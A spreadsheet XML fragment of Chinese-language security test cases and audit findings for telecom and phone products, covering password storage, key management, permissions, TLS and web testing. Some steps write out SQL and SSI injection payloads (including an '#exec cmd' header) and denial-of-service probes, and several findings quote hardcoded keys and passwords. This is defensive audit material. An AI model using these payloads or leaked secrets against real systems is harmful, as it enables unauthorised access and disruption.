3、为每台设备生成不同的密钥材料，以保证根密钥不同，并安全存储密钥材料。</t>
  </si>
  <si>
    <t>1.访问显示敏感数据的Web页面；
2.查看浏览器地址栏中的URL是否携带了随机数。</t>
  </si>
  <si>
    <t>1.目标系统正常运行
2.查找系统内存在调用关系的执行文件</t>
  </si>
  <si>
    <t>1.口令将过期时，用户登录时提醒密码将过期，提醒用户修改。
2.口令过期，用户登录不成功，或者强制用户修改口令。</t>
  </si>
  <si>
    <t>问题1（一般）：“修改自定义用户绑定的命令组”、“修改本地用户的用户级别”、“mod op修改其他账号密码”三个操作记录安全日志的级别应该为重要级别。参见DTS2014041704446
问题2（提示）：1）使用命令snmp-agent community complexity-check disable关闭SNMP团体名复杂度检查时，但未在logbuffe记录该日志，证明该日志级别过低。日志分成0-7级别，display logbuffer只能显示0-5级别的日志，证明该日志是级别低于6级（一般提示信息）。将高级别的安全类日志错误地定义成一般提示信息，导致管理员忽略。2）新建用户但未在logbuffe日志中记录，证明该日志级别过低。日志分成0-7级别，display logbuffer只能显示0-5级别的日志，证明该日志是级别低于6级（一般提示信息）。将高级别的安全类日志错误地定义成一般提示信息，导致管理员忽略。3）锁定用户但未在logbuffer日志中记录，证明该日志级别过低。日志分成0-7级别，display logbuffer只能显示0-5级别的日志，证明该日志是级别低于6级（一般提示信息）。将高级别的安全类日志错误地定义成一般提示信息，导致管理员忽略。
问题3（提示）：1）产品文档中介绍系统接口日志和安全日志级别默认为INFO（实际要求也为INFO）；2）安装指导书中也无提示需要修改，导致此两种日志未记录。建议：配置文件中默认配置与系统要求保持一致。</t>
  </si>
  <si>
    <t>问题1（致命）：隐藏URL：http://192.168.2.1/html/capture.html，包含端口镜像抓包功能，且采用完全抓包方式，即对数据包不进行任何处理。
问题2（致命）：CalendarProvider.apkk的Content Provider组件暴露，利用此漏洞，第三方应用可以随意访问日历存储内容，存在敏感信息泄露安全风险。
问题3（致命）：1)通过代码review和APK反编译，都可以看到phone.apk应用存在通话录音相关代码：pretected void changeBgRecordingCall(){if(null!=nPhoneBgRecording &amp;&amp; RecordingCall.RAUSE == mPhoneBgRecording.getRecordingCallState()){....}else{....mPhoneBgRecording = null;}
问题4（致命）：1）手机拨号进行语音通话，在通话时打开“录音机”应用；2）通话完成后保存录音，可以听到保存的录音记录了通话双方的对话，存在双向录音行为。建议：通话过程不允许进行任何形式的双向录音。
问题5（严重）：Framework中的录音接口函数支持单独的通话上行和通话下行录音，未彻底删除通话录音代码。
问题6（严重）：存在敏感功能，ipcapture.cgi接口可以在WEB节目开启抓包功能。
问题7（严重）：存在可以开启Telnet功能的接口。</t>
  </si>
  <si>
    <t>1、识别出业务的用户数据删除场景；
2、结合后台数据库检查用户数据信息进行了物理删除；</t>
  </si>
  <si>
    <t>1、敏感个人数据是否明文存储在系统日志文件、代码、Cookie中
2、操作人员访问个人数据
3、产品对于个人数据的访问控制策略
4、数据主体的银行卡号的存储</t>
  </si>
  <si>
    <t>问题1（致命）：1）使用在线升级EMUI功能，升级过程抓取数据交互报文；2)在抓取的报文中可以看到IMSI的号码被发送到服务器。
问题2（致命）：在phone.apk中开放了录音权限。
问题3（严重）：EMUI多个模块在后台搜集用户数据，且不支持关闭，容易引起安全质疑。
问题4（提示）：8950内置浏览器中的设置--&gt;隐私和安全选项中，COOKIE、表单数据和位置默认为开启状态，存在泄漏个人隐私数据的风险，建议默认关闭。
问题5（提示）：在提供的源代码中查找location等关键字，实测结果显示在ProjectMenu.apk工程菜单应用中，有定位用户GPS位置信息代码。</t>
  </si>
  <si>
    <t>问题1（致命）：web页面有越权漏洞，权限控制只在前段限制，后台未做校验。参看DTS2014032701327
问题2（致命）：修改clj的用户信息，拦截请求，添加参数sysStaffVO.staffId=101 sysStaffExtVO.staffId=101 发送请求，响应成功： 101的信息被修改成功。参看DTS2014071801181
问题3（严重）：通过BurpSuite绕过老密码验证可成功修改用户密码。</t>
  </si>
  <si>
    <t>问题1（致命）：Gallery2应用在Y330-U01产品中关闭了人脸识别功能，申请的电话权限也应同时删除。Gallery2.apk:&lt;uses-permission android:name="android.permission.CALL_PHONE" /&gt;。建议：删除phone权限。
问题2（致命）：Phone应用申请读取系统日志权限，该权限为敏感权限，且不为该应用功能权限。/Phone.apk.xml:     &lt;uses-permission android:name="android.permission.READ_LOGS" /&gt;此权限为low-level权限，API 级别为1级，可直接读取设备底层的系统级别的日志，如获取语音通话数据等。StringREAD_LOGSAllows an application to read the low-level system log files.Since: API Level 1 。建议：删除该权限。
问题3（致命）：反编译华为输入法应用--HwIME.apk，查看AndroidManifest.xml文件，分析发现申请了多余的敏感权限：android.permission.RECORD_AUDIO。根据权限最小化原则，存在安全风险，容易引起外界质疑。建议：删除多余权限。
问题4（严重）：华为weatherClock应用中申请多余权限存在安全风险在实际代码中并没有注册接收这个广播的权限\packages\apps\HwWeatherClock\AndroidManifest.xml。建议：删除该权限。
HCSEC-1039-1023 Elevation of privilege vulnerability due to presence of TELNET capability on LAN interfaces.</t>
  </si>
  <si>
    <t>1、管理口令禁止明文存储在数据库、配置文件、日志、cookie、调试跟踪信息中，业务口令须支持加密，并缺省加密。
2、口令不需要还原的场景（第三方及开源暂不要求）：
  （1）在口令不需要还原的场景下禁止使用可还原的方法（如：对称加密）保存口令。
  （2）禁止使用HASH(用户名||口令)、HMAC(用户名，口令)、HASH(口令 XOR salt)。
  （3）HASH（salt||口令）可以作为遗留兼容老版本使用，但新开发的系统禁止继续使用。
  （4）性能不敏感且无约束的场景下，必须使用不可逆散列PBKDF2算法保存口令，迭代次数缺省建议10000次。
  （5）性能比较敏感（如：有大并发要求）的场景下，PBKDF2算法的迭代次数至少大于1000次
  （6）对于有性能约束的产品（如：嵌入式产品）PBKDF2的迭代次数推荐至少大于500次。对于性能极为敏感的应用场景，至少使用HMAC（salt，口令）且口令需加密保存
  （7）PBKDF2不能使用公司规定的常见不安全hash算法(如：SHA0，MD2，MD4, MD5等)。
  （8）系统存储口令时，必须确保不同用户使用不同盐值，盐值salt的长度至少8字节，且须使用安全随机算法生成。
3、在口令需要还原的场景至少使用AES128-CBC模式，推荐使用更强的密码算法加密口令，IV使用安全随机数生成。
4、盐值不能是固定的字符串（如：用户名等）而必须是安全随机数。
5、（可选）口令单向保护过程使用的盐值应在服务器端产生</t>
  </si>
  <si>
    <t>1.目标系统运行正常
2.产品提供资料</t>
  </si>
  <si>
    <t>问题1（致命）：1）终端口令安全要求：口令必须包含小写字母、大写字母、数字、特殊字符中至少两种字符。然而，Sophia-L10手机的备份密码可以只有小写字母、大写字母、数字、特殊字符中的一种。
问题2（致命）：1）登录FM部件页面，配置SNMP管理站SNMP V3协议信息，SNMP V3加密密码可以设置为123456789，不满足红线密码复杂度要求，容易遭到破解。注意认证密码也不满足密码复杂度要求，也需要关注。
问题3（致命）：SOAP服务的默认账号soapuser的默认密码是soapserver，复杂度不满足红线要求。产品资料建议开局后修改soapuser的口令，但实际测试结果是服务端没有按照复杂度要求或安全策略校验，当密码修改为1,123，均显示修改成功。
问题4（致命）：在设置tr069的cpe口令时，口令不完全满足口令复杂度要求，可以设置为用户名的倒序。
问题5（致命）：1）通过MML工具执行MOD FTPPWD命令修改FTP帐户密码，将“bamuser”帐户的密码修改成‘1’可以执行成功；
问题6（致命）：系统安装时数据库默认弱密码。
HCSEC-1047-0014 Password lengths are unnecessarily restrictive.</t>
  </si>
  <si>
    <t>1.查看对应的版本是否有公开漏洞
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1097
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2855</t>
  </si>
  <si>
    <t>1.取得被测应用程序某协议组件的安装包。
2.应用程序支持某通信协议，且处于正常运行状态。</t>
  </si>
  <si>
    <t>1.密码/密钥要求采用单向加密算法进行加密保护，建议优先使用HMAC算法。推荐的不可逆密码算法： SHA256、SHA384、SHA512、HMAC-SHA256、HMAC-SHA384、HMAC-SHA512，不得采用自研的加密算法）
2.用户名若加密存储，不能采用与加密密码同样的算法。
3.密码/密钥不能明文存储在系统(物理/内存数据库、配置文件、日志、脚本、jsp.jar包、zip包等)任何地方。</t>
  </si>
  <si>
    <t>1、根据产品支持的特性，分析工作密钥的使用。查找源码，看工作密钥在系统中存储时，是否由根密钥加密，且不同的应用是否使用不同的工作密钥。
2、查找密钥的使用过程，看密钥、密钥材料一次使用完成后，是否及时清除。
3、查看产品文档，看是否有相关根密钥、工作密钥导出方法的说明。
4、查看产品文档，看是否存在工作密钥在不同产品间或产品不同组件间分发的应用场景，如果存在，则查看相关传输是否加密。
5、查看产品文档，看是否存在系统间共享密钥的应用场景，如果存在，则查看系统间共享密钥的生成方式。
备注：本用例可以结合对产品线人员访谈进行。</t>
  </si>
  <si>
    <t>1、产品采用密钥分层管理结构，区分根密钥和工作密钥
2、获取产品文档
3、获取产品源码</t>
  </si>
  <si>
    <t>问题1（一般）：使用备份应用对照片等数据进行加密备份，导出备份数据到PC电脑上，仍然能够查看做加密备份的照片，并没有对用户要求做加密备份的照片提供加密保护存储，容易引起客户质疑华为产品。
问题2（一般）:按照产品联机帮助手册中描述，可以从网管服务器的预置证书（p12格式）导出该预置证书私钥：按照描述导出的华为预置证书私钥是未加密格式的，通过工具可以查看到私钥的全部明文内容.
问题3（一般）：1、维护人员使用U盘备份设备软件大包，补丁，数据库，业务脚本，以上资产在写入U盘时未加密存储，如果被攻击者非法获取U盘并恶意修改后，维护人员在再次使用该U盘恢复配置时，会导致设备被恶意攻击，如植入非法用户、业务被破坏修改等。
问题4（一般）：NAG网元内发现大量备份文件，其中包含部分敏感备份文件，如passwd，shadow文件等。备份文件中含敏感信息，例如passwd.old密码备份文件中含用户信息，被非法获取有被暴力破解风险。</t>
  </si>
  <si>
    <t>1.数字证书对应的私钥是否支持按照PKCS标准格式进行安全加密存储
2、对于华为预置颁发的证书或自研系统生成的证书，用于加密私钥的口令的复杂度是否满足口令复杂度要求</t>
  </si>
  <si>
    <t>问题1（致命）：DES、3DES加解密用的key值硬编码在函数des_decrypt_base64/des_encrypt_base64中。
问题2（致命）：agent模块中存在用户数据加密的密钥硬编码"a key equal to 24 hahaha"。
问题3（致命）：N2510软件安装包解压后，当中含有的encryptv3.jar文件中，含有密钥硬编码。该jar包应用于FTP、数据库用户的加解密。获得该JAR包，可能对密码进行破解。
问题4（严重）：日历应用中与Email交互的模块存在硬编码，static final String PASSWORD = "password".
The encryption key and Initialisation Vector (IV) are hard coded in the software; this means that the password is potentially recoverable by an attacker with access to the software in either the source code or binary form. The same encryption key is used on the CX600 and may be used on other Huawei products. So an attacker, having broken the encryption, can decrypt passwords across a range of equipment.</t>
  </si>
  <si>
    <t>1.系统的文件和目录权限应参考《身份和访问管理安全设计规范》中规则3.2.1【实施指导】中的表格进行设置
2、私钥文件不能被普通的ftp用户下载
3、一般维护级别的用户不能从数据库里复制敏感数据到外部机器
4、Unix和类Unix系统用户的umask须被设置成027或更大
5、（可选）包含敏感信息的文件的文件名随机化处理，不能包括类似于Key，password，privatekey等字符
6、必须对存放会话文件的目录进行访问限制（如只允许特定用户或用户组访问）,对存放会话信息的数据库表做限制（如只允许特定用户可以读、写）
对于终端产品：
7、检查短信发送接口必须进行权限控制，防止存在权限控制漏洞，导致攻击者可以直接使用短信发送接口发送短信
8、必须对终端功能模块的广播机制进行控制，避免任意其他应用发送的广播都会被本应用响应并开启相关功能（可以通过在Androidmanifest.xml中的&lt;receiver&gt;tag里设置只接收哪些应用发送的广播）
9、终端不能暴露了某些可能导致对攻击者进行DOS攻击的接口（如：免打扰功能接口HarassmentInterceptionService暴露），否则将导致攻击者篡改手机的黑名单信息，让用户接不到电话</t>
  </si>
  <si>
    <t>1、用户登录失败后，查看服务器响应
2、如果认证失败的返回报文中携带了错误码，错误码应同时代表“用户名或密码错误”的含义；分析错误码。
3、（可选）无论帐号名是否存在，在达到锁定阈值后，是否启动锁定机制</t>
  </si>
  <si>
    <t>1、服务器端向客户端发送hello request消息；
2、截止客户端回应消息并丢弃；
3、观察客户端反应</t>
  </si>
  <si>
    <t>should
记录层压缩算法中TLSCompressed.length不能 2^14+1024字节 业界标准</t>
  </si>
  <si>
    <t>1、代码对TLSCompressed.length的取值限制到[0-16384]字节；
2、当值大于16384字节时会上报致命的解压缩错误。</t>
  </si>
  <si>
    <t>1、检查记录层协议对于TLSPlaintext.length的大小进行了限制，是否小于2^14字节
struct {
           ContentType type;
           ProtocolVersion version;
           uint16 length;
           opaque fragment[TLSPlaintext.length];
} TLSPlaintext;</t>
  </si>
  <si>
    <t>1.Web Service运行正常
2.已知WSDL地址</t>
  </si>
  <si>
    <t>1.获取WSDL文档
2.了解系统对外提供的接口。</t>
  </si>
  <si>
    <t>1.进入系统
2.对存在使用客户端输入作为值进行创建数据处理的输入框输入一个极大的值，导致服务器端处理能力下降。
3.如果客户端进行了限制，可以使用代理工具拦截请求消息，并修改相应的字符，发送至服务器
下面是一个使用 Java 编写的脆弱代码的简单例子：
String TotalObjects = request.getParameter(“numberofobjects”);
int NumOfObjects = Integer.parseInt(TotalObjects);
ComplexObject[] anArray = new ComplexObject[NumOfObjects]; // wrong!
测试思路：在这个测试中我们检查是否有可能使用分配大量对象的方法来耗尽服务器资源。如果用户可以直接或间接的提供一个值，可以明确在应用服务器中创建对象的数量，并且如果服务器没有对这个值给出一个严格的上限，那幺就有可能导致运行环境耗光所有可用内存。</t>
  </si>
  <si>
    <t>1.目标应用运行正常
2.存在根据用户输入数据进行处理的功能，主要为根据输入进行循环处理。</t>
  </si>
  <si>
    <t>1.进入系统提交请求消息；
2.使用WEB代理工具拦截请求消息，在HTTP头信息中也可以执行该注入：
GET / HTTP/1.0
Referer: &lt;!--#exec cmd="/bin/ps ax"--&gt;
User-Agent: &lt;!--#virtual include="/proc/version"--&gt;</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统支持SSI指令</t>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统某些功能的链接以及相关参数。</t>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具拦截请求消息，修改Cookie信息，如填充一些无关的key/value对，使cookie大小超过HTTP请求头域的大小限制，并发送至服务器。</t>
  </si>
  <si>
    <t>1.使用已知用户名密码登录系统
2.手工对操作员帐号和最终用户帐号（如果存在的话）进行锁定操作。
3.使用被锁定的帐号登录系统</t>
  </si>
  <si>
    <t>密码找回不存在漏洞
1.立即修改密码与直接显示旧密码均属于不安全做法；
2.最好的安全机制是通过用户最初注册时提供的电子邮件地址或其它邮件地址进行密码重置;</t>
  </si>
  <si>
    <t>1、打开登录界面
2、输入用户名，密码框中输入1' or '1' = '1等或使SQL拼接后为真的值，根据SQL语法构造相应的输入。
3、步骤2中无法直接输入特殊字符时，使用WEB代理工具拦截请求消息，在密码字段输入上面的注入语句。</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.未知系统帐号及密码
3.配置完成WEB代理工具</t>
  </si>
  <si>
    <t>1.系统仅提示验证码错误的信息，不提示用户名或密码错误；
2.响应消息里没有对用户名密码的判断结果</t>
  </si>
  <si>
    <t>1.访问带有验证码的登录页面；
2.在登录界面填入用户名和口令，填入正确的验证码，提交表单；
3.使用Web代理工具拦截消息，检查用户名、密码和验证码是否在同一个拦截窗口中。</t>
  </si>
  <si>
    <t>1.检查结果为：列表为空，没有Set-UID和Set-GID的恶意程序
2.如果列表不为空，则需要结合产品实际情况，人工审核多余的suid文件存在的必要性</t>
  </si>
  <si>
    <t>1.产品提供的软件包是准确的
2.coverity、fortify的版本是最新的</t>
  </si>
  <si>
    <t>1、提供了查询、更新、删除个人数据的功能并有身份认证机制
2、查询、更新、删除的功能是实时且无成本的。
3、在用户帮助、操作指南或隐私声明里面里面告知了数据主体进行查询、更新、删除的方式</t>
  </si>
  <si>
    <t>该行为对应权限
android.permission.ACCESS_COARSE_LOCATION
android.permission.ACCESS_FINE_LOCATION
android.permission.ACCESS_LOCATION_EXTRA_COMMANDS
android.permission.ACCESS_MOCK_LOCATION</t>
  </si>
  <si>
    <t>人工测试 + 访谈确认：
1、输入密码的界面上，密码框中的密码不能显示为明文，涉及场景：
（1）注册、登录、修改密码
（2）绑定第三方SNS、IM帐号
2、查看客户端安装目录下的log和fault文件夹中的日志文件，均不能显示明文
3、与开发确认，编码的时候，内存中保存的密码，在登录以后就释放掉了
4、在客户端提交登录请求，登录成功后，启动winhex.exe读取客户端所在操作系统内存，搜索当前内存内容中是否有刚才提交的明文口令；
常见漏测举例：
1、发送给最终用户的含有口令的短信
2、操作命令后面的参数中包含口令，整个命令被记录到日志中或是快捷配置中
3、口令的变量在界面打印&amp;终端打印中出现，界面打印&amp;终端打印时通过读取口令变量获得口令实际的值</t>
  </si>
  <si>
    <t>1、不存在恶意广告、吸费陷阱、恶意消耗用户流量的行为
2、如果有资费消耗、广告的功能，一般会是局方需求，需要与客户确认清楚
3、涉及资费的功能，需要给用户合理的提示，使得用户了解哪些地方会涉及扣费
4、流量专项测试需要有测试报告与数据，记录客户端的流量消耗表现；同时流量的消耗与竞品软件做比较，不能相差太大</t>
  </si>
  <si>
    <t>1、安装McAfee Android杀毒软件到手机，对手机进行安全扫描和实时监控
2、打开测试应用apk，进行正常的使用</t>
  </si>
  <si>
    <t>通过在源代码中进行关键字查找，是否满足以下要求
1.调用OpenSSL时不能指定RSA_PKCS1_PADDING为填充方式。
2.调用iPSI时不能指定RSA_PKCS1_PADDING为填充方式。
3.Java里Cipher.getInstance("XXX")，“XXX”里不能包含PKCS1字样。</t>
  </si>
  <si>
    <t>目的和意义：
RC4算法加密的密文容易被攻击者较为容易的解密，所以已经被业界和学术界公认为“不安全的密码算法”，在必须使用流加密算法的场景下，需要使用AES的OFB和CTR模式替换RC4算法。
子检查项：
1、禁止使用RC4算法
1、禁止在SSL/TLS里使用包含RC4的算法套件
2、在需要使用流加密的场景下是否使用AES的OFB和CTR模式替换（标准协议规定的除外，如：3GPP的A5算法除外）</t>
  </si>
  <si>
    <t>要求一、检查通道或者加密方式是否安全
1、按照加密算法规范的要求，检查通道是否走TLS的安全加密通道加密；
2、按照加密算法规范的要求，对于密码不可逆的场景检查是否采用Sha256等公司规定的安全Hash算法进行加密，并加了安全盐值；
3、对于加密算法可逆的场景，检查是否采用的AES256等公司规定的安全可逆算法加密，密钥是否安全保存；
要求二、检查是否存在弱加密算法套和弱加密函数
方法一：
1、使用Nessus扫描工具对系统进行扫描，看是否有弱加密算法的使用。
方法二：
2、查看产品相关文档，查找涉及敏感信息的特性说明。
3、检查敏感信息在产品中的加密方式是否符合要求。
方法三：
4、在源码中搜索相关加密函数，查看相应加密方式的使用是否合理。</t>
  </si>
  <si>
    <t>1.不管新开发产品还是定制补丁版本都没有使用有专利/私有加密算法。
2.禁止使用当前已知的不安全的密码算法，标准协议定义且没有替代算法的或需要与第三方系统对接的除外，不建议使用存在安全风险的密码算法。
如需要与第三方系统对接或兼容老系统，产品支持使用不安全密码算法的情况，应在产品CPI资料中提示风险。---此条不作为2012年产品网络安全红线落地安全稽核的处罚依据，但会作为产品的安全风险项提出。</t>
  </si>
  <si>
    <t>密钥明文保存在本地，攻击者可以轻易的获取密钥并使用密钥解密密文，数据的机密性无法保证，整个加密机制将完全失效；敏感信息明文保存在本地，攻击者可以轻易的获取敏感信息，造成敏感信息泄露。
检查密钥的存储是否符合以下要求：
1、密钥不允许明文保存在本地
2、密钥材料及密钥组件在本地保存时有严格控制其权限</t>
  </si>
  <si>
    <t>1、使用被测试的应用XXX各个功能一段时间（尽可能覆盖所有的敏感功能，如：登陆、传输、同步、注销等等，为了保证在data/data/com.XXX生成数据）
2、打开ddms-&gt;File Explorer，进入data/data分区下应用包所在的文件夹（data/data/com.XXX），查看文件夹下除了.so、.lib外所有文件的other组权限</t>
  </si>
  <si>
    <t>访问含敏感信息的界面/接口要有认证，文件要有权限控制(非同组用户不可读取)。
注：口令认证是最小认证机制。（ip认证比较弱，是否可接受根据具体场景判断，采用IP认证必须得到安全TL确认，且要确保IP来源可靠，可被记录日志等基本认证要求）
只要有如下任一条件的应用场景，就不适合使用IP认证：
1.安全要求高的应用
2.基于UDP协议的应用
3.需要更细粒度的权限控制
4.客户端主机上多应用，多帐户
5.客户端IP易于变化，或者客户端IP是共享IP
6.跨越不信任网络</t>
  </si>
  <si>
    <t>1、从服务器上拷贝应用到被测手机
2、打开手机上的文件管理器，安装该apk
3、再一次用该apk在手机上安装</t>
  </si>
  <si>
    <t>2、能安装成功
4、安装失败</t>
  </si>
  <si>
    <t>1、查看系统配置或文档，看是否可以使能CRL验证。
2、如果可选CRL验证，则开启，并使用合法有效的CRL，看证书协商是否可以通过。
3、修改被测设备系统时间，使CRL过期，看是否可以协商通过。
4、吊销对端证书，并刷新CRL，使对端证书序列号出现在CRL中，看是否可以协商通过。
备注：如果产品支持通过OCSP协议验证证书是否被吊销，则还要验证OCSP协议的有效性。</t>
  </si>
  <si>
    <t>1、步骤1可以协商通过。
2、步骤2、3、4、5协商不过。</t>
  </si>
  <si>
    <t>1、遍历客户端上所有非查询操作，提供其日志，保证每一个非查询操作有日志。
2、遍历接口中所有非查询操作，提供其日志，保证每一个非查询操作有日志。
3、访谈产品其他形式的非查询操作
注：建议和功能测试一起进行，遍历所有非查询类操作</t>
  </si>
  <si>
    <t>1、不需要的功能需要彻底将代码删除或注释
2、不能通过逻辑判断、配置文件等，在局点中禁用某项功能
3、涉及敏感数据上传的需求（如上传联系人、短信、个人资料、位置信息、通话记录等），若局点不需要，应将代码彻底删除或注释，而不是通过逻辑判断、配置参数、配置文件等方式禁用功能</t>
  </si>
  <si>
    <t>1、检查运行在数据主体系统上的应用软件连接至互联网之前，是否在UI界面提供明示同意的选项并获得用户明确同意
2、检查对于数据控制者，如产品无操作界面，是否在产品资料中明确说明程序会连接至互联网</t>
  </si>
  <si>
    <t>1、系统运行正常
2、系统支持IPSec协议
3、获取产品资料</t>
  </si>
  <si>
    <t>1.被测协议安装包进行了混淆或加壳，可以防止被逆向或增加逆向的难度。
2.多使用安全函数，危险函数使用严格受控。
3.被测协议不存在缓冲区溢出漏洞。</t>
  </si>
  <si>
    <t>1、系统按操作文档部署完成。
2、最新操作系统补丁已全部安装。</t>
  </si>
  <si>
    <t>sqlmap工具不能得到目标服务器的注入点。
备注：页面可能接受多个参数，需对每个参数都进行测试。</t>
  </si>
  <si>
    <t>1、访问被测web网站，尝试在各种表单的输入域（包括隐藏域）提交如下内容：&lt;!--%23echo var="DATE_LOCAL" --&gt;。
2、如果页面本身或其源码中显示如下相似的时间信息：Monday, 19-Jan-2015 11:00:34 Eastern Daylight Time，说明存在SSI注入漏洞。
备注：通常，扩展名为.shtml、.stm、.shtm的文件容易受到SSI注入攻击的影响。</t>
  </si>
  <si>
    <t>1.检查各页面的隐藏域或URL中携带的重要参数（比手机号、帐号、价格等）；
2.如果携带了，那么尝试通过WebScarab拦截并修改这些参数，以达到冒充他人身份或篡改商品价格等目的；
3.提交请求后，根据服务器端相应信息以及检查后台数据库的数据变化，来判断篡改数据的请求是否被处理。</t>
  </si>
  <si>
    <t>1、在系统启动瞬间按键盘上按键，如ESC等查看是否无需密码就能进入启动菜单。
2、检查是否存在隐藏菜单可进入，通过查找是否可以通过硬编码的密码进入隐藏菜单。</t>
  </si>
  <si>
    <t>1、查看产品在编译的过程中，是否开启安全选项。
（1）启用基于探测方法的防御：在VC编译器中启用“/GS”选项，gcc中使用“-fstack-protector”编译选项。
（2）启用数据执行保护功能：使用VC编译的时启用“/NXCOMPAT”编译选项。
（3）启用地址空间格局随机化ASLR：使用VC编译时添加“/DYNAMICBASE”编译选项，使用gcc编译时使用“-Wl -pie”编译选项。</t>
  </si>
  <si>
    <t>1.新建用户，设置口令有效期。
2.修改系统时间至口令将过期，用户登录检查登录情况。
3.修改系统时间至口令过期，用户登录检查登录情况。</t>
  </si>
  <si>
    <t>1、识别出业务的用户数据删除场景；
2、结合后台数据库检查用户数据信息是否进行了物理删除；</t>
  </si>
  <si>
    <t>1、禁止使用自行设计的密码算法或使用未公开算法细节的算法；
2、禁止自行对标准密码算法进行改造并使用；
3、禁止使用自行定义的通过变形/字符移位/替换等方式执行的数据转换；
4、禁止使用编码的方式（如Base64编码）实现数据加密目的；
5、禁止使用差错控制编码（如奇偶校验、CRC）实现完整性校验。</t>
  </si>
  <si>
    <t>问题1（致命）：1）普通用户/操作员用户/无权限用户（test1）登录imana。2）用户修改url，可访问/web/web下各个文件。如访问jar包，如访问系统操作日志；3）上述文件，操作员用户、普通用户均无法通过登陆BMC进行访问。 问题扩展：Web server没有没有对访问的请求进行过滤。普通用户可以通过http访问/web/web/路径下任意文件。使低权限用户越权访问系统。建议Web server对请求进行过滤。Web服务器只允许*.asp的请求通过。
问题2（致命）：OSMU /omc_control_v1 操作可被用来越权下载属于root的文件(所有OSMU用户)。
问题3（致命）：DesktopService /api/neManageNic/getNECount 可以删除服务器任意目录和文件（需要拥有 WEB NIC或者WEB AMS鉴权）。
问题4（致命）：OSMU /rpc 部分操作未鉴权，导致动态方法调用，可被用来配合上传拿取服务器权限（无权限）（jsonrpc_operation）。
问题5（致命）：不登录的情况下可以直接从WEB上下载changtime.exe文件，该文件是系统内部调用的工具程序,用于修改服务器的时间。应在认证鉴权后下载此文件https://100.160.160.130:8088/deviceManager/devicemanager/bin/ChangeTime.exe</t>
  </si>
  <si>
    <t>1、系统认证时，必须提供防暴力破解机制
2、当产品使用验证码时，必须先对验证码进行验证，再验证帐号/口令的正确性
3、当重复输入错误口令次数(如3次）超过阈值时，返回的错误信息不应泄露系统敏感信息，如对于不存在的帐号也应该提示被锁定，防止与已存在的帐号提示信息不一致。</t>
  </si>
  <si>
    <t>1、管理员重置、修改自己的口令，管理重置其他用户口令；
2、（可选）使用交互式命令行参数修改口令时，应对新口令进行确认。
3、旧口令输入错误时，应提示旧口令输入错误，并使该口令修改操作失效。</t>
  </si>
  <si>
    <t>问题1（致命）：串口登录方式对应的帐号admin，不能提供密码修改功能。
问题2（致命）：SSH的两个账号admin和user的口令，通过工具用设备的SN号生成，并且密码不能修改；
问题3（致命）：Cli_config.h中硬编码密码，upg_global.h中硬编码口令，并且在解析升级包和文件生成行为链表的函数Upgrd_ParseRemoteFile中使用到此硬编码口令。
问题4（一般）：测试中发现产品的WPS功能PIN码是每个设备都有一个唯一的固定的PIN码，用户无法修改，一旦被攻击者获取，能够通过WPS PIN码连接到CPE设备，耗损用户数据流量。
问题5（一般）：U2000登录PTN，不提示修改管理员默认密码。
问题6（提示）：Uboot 使用默认密码登陆没提示修改密码。
问题7（提示）：超级管理员强制修改其它用户密码后，其它用户首次登录时候没有要求修改密码，可能导致账号被恶意使用。
问题8（提示）：新增业务用户，不勾选下次登录修改密码的情况下，可以添加成功。在PC上用这个业务账号登录，不用修改密码，直接登录成功。
问题9（提示）：使用默认用户名和口令登陆不提示修改密码。只在管理员指南中有说明。
问题10（提示）：Administrator用户首次登陆ESBM系统，系统没有提示修改初始密码。
问题11（提示）：设备的MML/QX默认账户密码、WIFI默认密码如果未修改，会上报PASSWORD_NEED_CHANGE告警提醒用户及时修改。SNMP V3默认账户密码未修改时，不会触发该告警上报。
问题12：产品安全证书的口令固定为“changeit”值，不支持修改。
问题13：出于测试目的产品使用了硬编码口令，该口令可被解密并读取。
问题14：产品提供硬编码的初始口令，用于恢复出厂配置。当用户修改口令后，新口令存在配置文件中，初始口令无效。存在问题是，前后两套口令，容易被质疑华为可控制启用哪套口令。
问题15：某产品代码中口令变量初始化时默认赋值了，口令还是加密存在配置文件中。但是读取配置文件中的口令失败时，口令变量还是初始值，只要输入的口令和这个初始值相同就可以通过认证。但是这种做法同样被质疑为口令硬编码，最好的做法是将代码中的口令变量的初始化值为空。
HCSEC-1039-1006 If the root terminal account’s default password is not changed, there is no indication in the MA5600T configuration that the account exists.</t>
  </si>
  <si>
    <t>1.遍历数据库中涉及密码存储的表字段检查，不存在明文存储的密码，采用单向加密算法进行加密保护（比如SHA256、HMAC-SHA1、HMAC-SHA256等）：
  a.对于新开发产品（资料规范）检查数据库接口说明书，搜索出相关字段；
  b.oracle数据库使用“SELECT * FROM USER_TAB_COLUMNS where column_name LIKE '%PASS%' ORDER BY TABLE_NAME”，搜索相关字段；
  c.其他数据库可以飞检或者导出数据库到一个文件中；内存数据库通常有接口文档，搜索相关字段。
2.遍历系统所涉及的所有文件，检查不存在明文存储的敏感信息，且所使用的加密算法符合要求：
  a.find . -name "*" | xargs grep -i "passw"（举例）
3.遍历版本发布路径中其他安装在Window或者其他终端上的程序：
  a.安装完成或者解压完毕后使用Search and Replace.zip搜索相关字段。
4.遍历日志文件或日志表，搜索密码/口令相关字段，不存在明文打印的密码，必须加密或掩码处理：
  a.打开debug日志执行自动化/手工用例保存日志；
  b.搜索代码类似log_debug.log_echo等打印语句是否涉及密码。
4.遍历其他提供给用服或者定制的软件/工具，只要接入客户网络，应该满足红线要求。</t>
  </si>
  <si>
    <t>问题1（致命）：snmp V3 加密所使用的密钥，是原密钥被sha或者MD5摘要后生成的。则配置文件中直接明文存储了此密钥，可能引起数据被监听破解。
问题2（一般）：1、通过putty登录CNA01节点，进入/etc/ssh目录下发现未加密的私钥。
问题3（一般）：管理员配置的密钥，进行哈希运算得到的哈希值作为传输加密密钥，哈希值应加密保存。
问题4（一般）：iPortal Https的服务端证书私钥明文存储。
问题5（一般）：刀片服务器证书Sha1RSA签名，私钥明文保存、且所有客户相同、不可替换。
问题6（提示）：1）iConfig上System Data Config &gt; Uniconfig Info表配置如下：Secret Key：AAAabcdefghijklmn，IV Parameter：abcdefghijklmnop。2）其中Secret key和IV Parameter在界面显示和后台存储都是明文的。</t>
  </si>
  <si>
